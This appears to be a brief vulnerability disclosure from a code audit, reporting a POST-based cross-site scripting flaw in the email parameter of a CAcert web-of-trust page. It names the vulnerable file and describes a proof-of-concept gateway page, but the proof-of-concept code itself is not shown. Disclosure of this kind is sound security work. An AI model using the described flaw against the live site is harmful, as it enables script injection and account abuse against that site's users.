https://www.cacert.org/wot.php?id=5 multiple POST[email] XSS
This is part of a code audit on cacert sources. Francesco 'ascii' Ongaro - www.ush.it
HTML POC
 >>> POST XSS and external source load POC <<<
I'm a gateway page, as used in post xss attacks.

 Click send to trigger the event.

 

Fast check

ND, i don't have the required access level and i'm
too lazy to setup a test enviroment : )

Vulnerable code

./pages/wot/5.php




Summary
- POST XSS
- magic quotes gpc ON
- affected by user role (only logged in ad with right permissions)